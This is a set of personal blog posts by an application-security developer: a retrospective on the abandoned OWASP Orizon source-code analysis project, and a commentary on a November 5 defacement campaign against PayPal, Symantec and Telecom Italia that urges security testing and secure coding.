• rely on github.com security that means that a break-in can also affect your web application. Fortunately you can reset your webapplication secrets so people will have to grant your application access again.

And you? Which is your opinion about using a third party identity provider to manager authentication in your application?

Of course the name was intended to be horizon but I mispelled the word and I found silly to cover my lexical mistake.

After 3 years without no fresh code, I think the project can be considered closed, also if some people seem to be interested into it.

It was yesterday and I found two emails about Owasp Orizon in my owasp.org account. In a first email an American guy asked how he can help me in improving the tool and in a second email a guy from I guess Asia region asked about milk a java interface for orizon I wrote in 2006.

True to be told Milk is even more abandoned than Orizon. When I answered the latter about he should use orizon instead, he said that even this one seems not to be updated since 2009.

The fact is that I had no fresh energy to put in this project anymore. I switched my programming interest from Java to Ruby and I’m working on sake now that it will become an hybrid security testing tool and the engine of an application security startup, codesake.

The concept

The first idea I had in mind when I designed Owasp Orizon was to translate the source code under security review in an intermediate XML representation and making security checks over it.

If you make your security engine to work on an XML syntax, supporting a new programming language is just writing a translator to that XML representation. Of course you will add some specific security check to the knowledge base.

This approach makes sense to me even today but it doesn’t work (or at least I wasn’t able to implement it in a working way).

Translating from different languages to a single XML syntax makes a lot of specific language expression power to be lost.

Java has a very complex subclassing mechanism. There are interfaces that they can be used to design a common API interface in example, there are abstract classes, there are the common hierarchy system in which a class can extend one or more classes.

Ruby has a completely different approach to modularity. Translating the twos in a common XML will result in a hard to read XML node full of options, attributes and so on.

The boost

We were in 2008. I got married and Owasp Orizon has one of its most prolific moment. I had the opportunity to fly in New York city for Owasp AppSec 2008 telling the world about the piece of code I was writing.

Feedbacks were good and I had two job opportunities today I regret I declined.

The fall

But in 2009 I had some harsh emails from a guy contributing to the project saying I wasn’t able to listen and to attract people.

A lot of people, from Italy I had to be honest, came here and say “I want to help” and after some mail they disappeared. Eventually I discovered they used Owasp Orizon as self-promoting during consultancy presales.

I loose motivation and energy. The code was ugly and writing an antlr parser instead of XML translation was really hard, we eventually moved to freecc but it doesn’t last.

Owasp Orizon source code was not updated anymore and you can imagine the whole story.

Something I learnt

Being part of Owasp Orizon project was inspiring and I learnt a lot both in terms of coding than in terms of community.

I traveled a lot and I started taking public speeches.

I enjoyed being part of Owasp.

But it’s time to move on. It’s time to improve and become bigger and bigger.

Enjoy It!

Winter sea side horizon picture is by me

November 5 it is a very symbolic data in the anonymous underworld and a massive defacement attack was carry on, at least, against PayPal, Symantec and Telecom Italia

Anonymous and other crews activities tell us an old story: the Internet is fragile and your web applications can be attacked anytime, anywhere and most of them are breakable.

The same old refrain

It was 10pm when I had dinner last night. My wife and my son were sleeping and I checked https://twitter.com/thesp0nge.

Some friends were talking about a massive defacement activities carried on by anonymous hactivists and other cracker’s crews not connected to the former.

It wasn’t the first time both PayPal and Symantec were attacked. The latter suffered from a source code leakage some months ago.

The news that impressed me much was the attack against Telecom Italia. In the news it’s reported that attackers found more than 3.000 Cross site scripting vulnerabilities.

Even Owasp WebGoat web application has less XSS.

Of course, this is not the only hole they exploit. The report talks about poorly written .htaccess file and weak passwords that they lead to a successful attack.

The power of now

In a post about web agencies and about marketing driven choices I talked about the dangers of publishing a web application without a security program.

Marketing departments want to deploy new websites, new features, new dynamic content to promote goods and to increase business. This is completely fair but it can’t be done without security awareness. The problem is that they don’t have any clue about their websites can be attacked and sometimes they didn’t trust their security departments trying to make them aware.

If your web manager says the website has to be online now or even worse we must add this brand new feature ASAP, you must take care about the new content can’t be exploited on the wild and you have to make all the necessary security tests before the content has to go online.

Off by one

Yesterday’s anonymous attack makes me think about how hard is our work. Sometime people says that only banks deserve to be protected. But attacking broadcasting companies or telcos can amplify your activism claims tons of times.

Don’t trust Web Application Firewalls. They will help but clever attackers may override their rules. Force developers to write secure code instead.

Enjoy it!